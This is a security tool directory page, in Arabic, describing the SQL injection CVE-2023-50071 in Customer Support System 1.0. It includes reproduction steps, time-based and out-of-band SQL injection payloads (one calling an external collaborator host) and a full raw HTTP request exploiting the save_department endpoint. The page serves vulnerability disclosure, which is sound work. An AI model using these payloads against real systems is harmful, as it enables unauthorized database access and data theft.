Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-50071 — ثغرات متعددة للحقن بـ SQL في /customer_support/ajax.php?action=save_department في Customer Support System 1.0 تسمح للمهاجمين المُصادَق عليهم بتنفيذ أوامر SQL عشوائية عبر id أو name. | Kitploit
أدوات/GitHubGitHub/geraldoalcantara/cve-2023-50071
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن قواعد البيانات
GitHubgeraldoalcantara/cve-2023-50071

CVE-2023-50071

ثغرات متعددة للحقن بـ SQL في /customer_support/ajax.php?action=save_department في Customer Support System 1.0 تسمح للمهاجمين المُصادَق عليهم بتنفيذ أوامر SQL عشوائية عبر id أو name.

عرض المستودع
37منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-50071

Customer Support System 1.0 - ثغرات حقن SQL متعددة - save_department

الوصف: تسمح ثغرات حقن SQL المتعددة في /customer_support/ajax.php?action=save_department في Customer Support System 1.0 للمهاجمين المصادق عليهم بتنفيذ أوامر SQL اعتباطية عبر id أو name.

الإصدار المعرض للثغرة: Customer Support System 1.0
مؤلف CVE: Geraldo Alcantara
التاريخ: 29/11/2023
CVE: CVE-2023-50071
رابط CVE: https://www.cve.org/CVERecord?id=CVE-2023-50071
رابط NVD: https://nvd.nist.gov/vuln/detail/CVE-2023-50071
رابط Tenable: https://www.tenable.com/cve/CVE-2023-50071
تم التأكيد في: 15/12/2023
تم الاختبار على: Windows

خطوات إعادة الإنتاج:

1- سجّل الدخول إلى التطبيق.
2- انتقل إلى الصفحة /customer_support/index.php?page=department_list.
3- أنشئ أو عدّل قسمًا وأدخل حمولة خبيثة في أحد المعاملات التالية: id أو name.
الحمولات:
id: (select load_file('\\c7kwr16trd54p693ve9xjbaao1usii67.oastify.com\test'))
name: '+(select*from(select(sleep(20)))a)+'

POST /customer_support/ajax.php?action=save_department HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------279004446431847057031125356738
Content-Length: 444
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/index.php?page=department_list
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l

-----------------------------279004446431847057031125356738
Content-Disposition: form-data; name="id"


-----------------------------279004446431847057031125356738
Content-Disposition: form-data; name="name"

test'+(select*from(select(sleep(20)))a)+'
-----------------------------279004446431847057031125356738
Content-Disposition: form-data; name="description"

Teste
-----------------------------279004446431847057031125356738--

المكتشفون/الإشادات:
Geraldo Alcantara

تنزيل الأداة